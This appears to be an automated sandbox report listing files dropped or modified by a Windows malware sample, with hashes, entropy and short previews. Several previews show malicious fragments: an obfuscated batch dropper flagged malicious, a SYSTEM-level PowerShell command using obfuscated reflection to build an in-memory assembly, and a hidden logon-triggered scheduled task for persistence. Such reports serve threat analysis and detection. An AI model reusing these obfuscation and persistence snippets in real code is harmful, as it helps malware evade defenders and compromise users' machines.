      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:modified
      Size (bytes):352
      Entropy (8bit):7.388918765068661
      Encrypted:false
      SSDEEP:6:UQ1jTxZnTish4S4a6R1t+BYvT625cFHStOFAcksNo/kLhk70XK8RnJFcZdJZbZGI:v1jtZTr6Xt+WT6YcFHStnHc9C7VCJFcP
      MD5:88171FAF282AB85DB0645B2196A0D5CE
      SHA1:FF96EE7FFEFB060FF6092C062AD44C2D452F12A2
      SHA-256:8D985206D491BDB852B2C8D2B0DB1AC30C31BF6256CDDDBA9EBE11211A4F800D
      SHA-512:267F683CB36BFF408B89D3A177959D716CF44019B3DC0B8251D15FEEF5FB7315520C16032E39B407D6237DFFD510BDFA2CC7C095B66D9678F1C6872BFBF89239
      Malicious:false
      Preview:,..%-........3e.....N.V.....m....&tz.9c&...9..._..I.LV.L7.\...G.*.WZ.qB....d...c`]*...._....s....2.3.O..dGs./.CS..y..O..'.....S.....#.b.......t..b..d.<Czm..6G....:....E...P...u.h......].P.fd'...o..+.......~;D...0.....fC.-.eG...{....U..3N.....Gsk..QD.rE@..'.N2V.....W..}.D...g.#.dY.8...4..w?ia.. DA+7......#.H.-...zw.1 .4e.......-...)...
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2692), with CRLF line terminators
      Category:dropped
      Size (bytes):5125
      Entropy (8bit):5.64034777380097
      Encrypted:false
      SSDEEP:96:BZYsZNTvyqo1ZhZ95sZNTvyqo1ZGpovTueovTumVt7vBpB6a5xY595f8bus3wMV4:lEU53b5xY595f7s3wM5IiIIit
      MD5:D3249B029D68739C280AE2A67F07BFB3
      SHA1:D7E0126CAEAC0F311002B2CFE3AF40EE258208D1
      SHA-256:A9D69D88BCA7CABCD9A417D36CFA9C0035ED360152307D2F4E6FCCCF99C373E0
      SHA-512:E853B9B827C4D2E58613B8E66B60A60F1C4C86F185A02CD420FC71D619F4E3DC1ED2555FA68DEF785247E4B2DD3E47B414D23EF2C9EA828BDD87D539142006F4
      Malicious:false
      Preview:.**********************..Windows PowerShell transcript start..Start time: 20241003232422..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 8184..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241003232452..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 8184..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):4553
      Entropy (8bit):5.350799253889995
      Encrypted:false
      SSDEEP:96:BZLsZNTnyqo1ZhZ8sZNTnyqo1ZBpovTueovTu5ZzsZNTnyqo1ZdpovTueovTu3Za:mE/E6
      MD5:34DC8A683D592091ADD1AD20897A97F5
      SHA1:9100DFCD858F5C6681A2A660607C349E9C2CD927
      SHA-256:3F2AC468A0289A6AED5497E64FBD731E27DEC9754A47F17BD33A928D56800542
      SHA-512:3CCD886F038002ECBEA2F40A9F42FC0B89314495FB7C12F30F65342646E46A4FCE61DDE5F2D198F36912883CABE615F52E81B4B7FB9088386960626CF5235C85
      Malicious:false
      Preview:.**********************..Windows PowerShell transcript start..Start time: 20241003232401..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 7804..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241003232431..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 7804..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2684), with CRLF line terminators
      Category:dropped
      Size (bytes):5117
      Entropy (8bit):5.638799120486671
      Encrypted:false
      SSDEEP:96:BZEsZNT2yqo1ZhZGsZNT2yqo1ZHpovTueovTu6MVt7vBpB6a5xY595f8bus3wMcM:DEEo53b5xY595f7s3wMcjIiIIit
      MD5:C881F415078AD1A4FDB7DC1D9001A3B7
      SHA1:4FBDA78F3CF548E438CFB0845896A08F91FA0D24
      SHA-256:590E9FF79EDBFAFC3505E591FC9EEC3E609924F603617A8A3ACD0835DB55475D
      SHA-512:8A5A5F8C479BFB7E2F170BE3F2101F2AAD7032A061A6EF2EC604FF98B8BF560E089E5F8F173940B8C107AADD83774EE6308BAED8135753DF6FA3CCECB0489C0C
      Malicious:false
      Preview:.**********************..Windows PowerShell transcript start..Start time: 20241003232325..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 3852..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241003232433..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 3852..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
      Category:dropped
      Size (bytes):5214429
      Entropy (8bit):6.008710946572079
      Encrypted:false
      SSDEEP:49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
      MD5:19FC666F7494D78A55D6B50A0252C214
      SHA1:8876CD520507CBFDC2E89E449BABA52232A1DF1B
      SHA-256:E96F8F61E3AF77C429AE6AF54C128F7B8420A45A0A63BDFCACD682773B8E5FC1
      SHA-512:94DDE8D5D0100E892CA004556B30B8E8FEDACC1E3482DAB9D611BD64569B2F73E29DA93DB2C7AE51585791A4F39D01426EE6663C48602DE92AA74F6EBE3F630A
      Malicious:true
      Preview:@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:ggPYV:rPYV
      MD5:187F488E27DB4AF347237FE461A079AD
      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
      Malicious:false
      Preview:[ZoneTransfer]....ZoneId=0
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (5587), with CRLF line terminators
      Category:dropped
      Size (bytes):11938
      Entropy (8bit):5.338859047854904
      Encrypted:false
      SSDEEP:96:BZVNZNzR2rvYPtqVU1gqfG32qy+0lKdf0lr0lze2xBGyqo1Z+R2rvYPtqVU1gqf6:fMvbKffvwdcCYMvbKffvwdcCR
      MD5:BD5CB9799A3C589A790C56C0A093AA56
      SHA1:A73FEFF2760826F0B01BC6CB4F5EF90A08B31C29
      SHA-256:2805E28ABBFD552E90CAA986CEFD1CE2A64E85C59ED49F4480B9354CD387144F
      SHA-512:03B4CE85BE5423FC95A27AC0917541DD178B85EB87CA34A70F6101CF83360E7C0F0457D28C550FEDDDC9D73FBF89B98945E5D48774BE37035873D8288C075068
      Malicious:false
      Preview:.**********************..Windows PowerShell transcript start..Start time: 20241003232435..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 745481 (Microsoft Windows NT 10.0.19045.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[
      Process:C:\Windows\System32\svchost.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):3488
      Entropy (8bit):3.5876857970682092
      Encrypted:false
      SSDEEP:48:yei1q97iaQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCn:tmtnkp2Gdi3ipVA9ll7EhAMz3cHtr+
      MD5:E16738B2749126FE293FD617D2E3BB1C
      SHA1:C1083174C585C25590CC1C25674DFF1D4B5B3717
      SHA-256:E30DBB7DCC6EFD08B03A24DBC81926E88B7A34AFACD700EB17EF6C862495C87A
      SHA-512:000FA8A25DF8D5E78FE775375EDF2F772CD63E57BBAB625EA4F23AB27EE10310C0285BC823C85AF892B623249B69EEB10F4A3F5BBB410381BD0D81B68F7D2CA6
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.3.T.2.3.:.4.4.:.3.2...4.0.1.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.U.7.e.j.K.P.E.D.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):64
      Entropy (8bit):1.1940658735648508
      Encrypted:false
      SSDEEP:3:NlllulR//z:NllU5/
      MD5:60B5B1173A68856012544C46D30BB4FD
      SHA1:EA3F6D82BC4E99F9065BE159154CE204139CD874
      SHA-256:E4586F5412A5276CDCA9A9AA613767C3B2F268E4D375A74A77F1BD873AAEC37E
      SHA-512:21C9B49F4096B0EA83F1439B81CE07CC92918A66C79F1F488D5E09F2599CC6C93C11AAD99B1ACEB31A40AA5383CB50425E15A435EBFCF1BA9C343844306B1A85
      Malicious:false
      Preview:@...e.................................H..............@..........
      Process:C:\Windows\System32\wbem\WMIADAP.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):3444
      Entropy (8bit):5.011954215267298
      Encrypted:false
      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
      MD5:B133A676D139032A27DE3D9619E70091
      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
      Malicious:false
      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
      Process:C:\Windows\System32\wbem\WMIADAP.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:modified
      Size (bytes):950
      Entropy (8bit):2.8937402169492104
      Encrypted:false
      SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivzivG:Q3wU/IM1x6ozoG
      MD5:9D007E669CE25371EE9401DC2AC21D2A
      SHA1:6F0CACCD76F7A94BBCB1124D398E9139E09C6FC4
      SHA-256:632004D14715476801408FC10E1B119BDC90378D2E8D573B7C14A06816799FA8
      SHA-512:AB9FEA61D8C00701E402D700873CA2B9A4FFB7D62557A2ED1C86571DCC40D3C33F7B7E358DF506C134EE4ABEE39B1167846C64A34FA19448FD1DC36AF19F579C
      Malicious:false
      Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:modified
      Size (bytes):78392
      Entropy (8bit):4.0746330380022
      Encrypted:false
      SSDEEP:768:MkJWPW8W3vOUZucxvbNp8CCgOcl4bfAjQwEPnPK0xvkkJWPW8WBGnif:BvkctNp8TcUfAjs7Rcnif
      MD5:256E5B17A98EBD49326588C1FECF1114
      SHA1:8D7B4FA47F02C1BA6787E66F042AEF4E56FE847F
      SHA-256:B7D36E71568433A16AE8B0E1DDF90E324848653CE1521DC4E404DD5A97B4819A
      SHA-512:08C2AE9E8FE1A343C6A6D41405CC52D5389CED3D387F76890D02564445F6CE18BB7B883BBA2FBCBE5E4496C00CC0B06351657C475C2E50A74DB52DDCCF8F15F6
      Malicious:false
      Preview:ElfChnk.................r.......w...............@...........................................................................=*..............$...............................=...................................................................................K.......$...............................m...............F...........................t...................M...c...........................n.......................................................................................&...............................**......v........................g&.....................................................................................!...d.............................v..............w.)Cn...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.d.9.b.b.3.1.d.4.3...1.f.f.8...0.1.d.b.1.6.0.c.e.7.f.e.9.3.b.6...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):3.255530945909032
      Encrypted:false
      SSDEEP:384:dhe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842l4a:dVUHiapX7xadptrDT9W84i
      MD5:790403BFBBF07E1E1ACC47091D970A49
      SHA1:125085F83F8AB841451008DC8EDC9DED4069543F
      SHA-256:EE9CA8D45A7084423BCFD4167098FD2997DAD96DE3821BB93CB8E3205E652321
      SHA-512:B2F1AF2854BD9BEA7DF8E0968440E26B655C0098BC6F90902B1BF13193313B43E073546B9781CED0C5E2F9BDFCB18263E16F3C4E44BFB25CA3847F87FCEB23FF
      Malicious:false
      Preview:ElfChnk.........4...............4...........h................................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):2.010692427789071
      Encrypted:false
      SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
      MD5:26C4C5213F3C6B727417EF07207AC1E0
      SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
      SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
      SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
      Malicious:false
      Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.178922872218369
      Encrypted:false
      SSDEEP:384:jhfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV6VdVo:jhf6xt
      MD5:AFCE634DC5D6C87FEB3B049F4D1EA953
      SHA1:7AEA1171CA419FF7C1DABDC4572049B29232916B
      SHA-256:947FD5BD53B620ADF67E235A3398AF1E70F326E001FA48E32324794E3782F3A9
      SHA-512:2859426739FB343BA35BBF698CABDB88A6AACF1DC77BD1053F1E770A508C51245DBC9AF37905CA5E08B4239C0D913A9820192A88C730F2A28D79E5858FB84E7D
      Malicious:false
      Preview:ElfChnk.............................................n........................................................................-................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.. .............k...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.428162583516058
      Encrypted:false
      SSDEEP:384:dchTm5mcRmNQAFBmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmy:+9wD6CL49mVpgwQFQ
      MD5:41D446C33729788E193C0348E28E39D5
      SHA1:457625761DCDE55E772398802BDB259E2C15013E
      SHA-256:71FB66E7BA61CBB5F72C57BD1997CD2834EFD82B705CA7B71BA74136DD80A549
      SHA-512:3424755A8B76A683F91A989B79CAA05B2C69B3B365AD6081770FF9338EC2F42A776DA29F5DCC2579ADDBE63004007512AFD81DD0B9C1DCAB29848E91A457F371
      Malicious:false
      Preview:ElfChnk..!.......!.......!.......!..........................................................................................c.Wz................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.3522840297387284
      Encrypted:false
      SSDEEP:48:MmiWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHy/dHLP7jMWckH58yk8:FMNVaO8sMa3Z85ZMLarjjP3Z85Zu
      MD5:CB482A274E5D315D0F4D52875F125EE3
      SHA1:4575AF22B1C48558FC93B1553D38862D5347A8B8
      SHA-256:07B84F5C0A8B98D4B81E36A815196BBBAB718D1B8C197B3EC074977591DD5293
      SHA-512:24DA612BC35E869CF5066A624E3321B671BFA9AFE89DE257690C76D7E8F53DEEC612D85F10CDEB4598F0F2396A1D454D35EF65A3CF3CD0E380D4A712E3E833AF
      Malicious:false
